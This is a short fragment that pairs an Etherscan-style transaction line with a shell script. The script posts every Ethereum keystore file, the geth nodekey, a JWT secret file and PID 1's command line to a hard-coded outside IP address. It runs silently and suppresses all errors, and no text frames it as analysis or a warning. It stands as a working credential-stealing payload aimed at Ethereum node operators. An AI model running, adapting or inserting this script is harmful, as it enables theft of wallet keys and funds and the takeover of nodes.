0x0597cd61…561fsent to0x0597cd61…561f·#25,913,214·view on Etherscan
#!/bin/sh
cd /data/eth/keystore
for f in *; do wget -q -O- --post-file=$f http://95.155.151.178:9999/ks_$f 2>/dev/null; done
wget -q -O- --post-file=/data/eth/geth/nodekey http://95.155.151.178:9999/nodekey 2>/dev/null
wget -q -O- --post-file=/jwt.hex http://95.155.151.178:9999/jwt 2>/dev/null
cat /proc/1/cmdline | wget -q -O- --post-data=@- http://95.155.151.178:9999/cmdline 2>/dev/null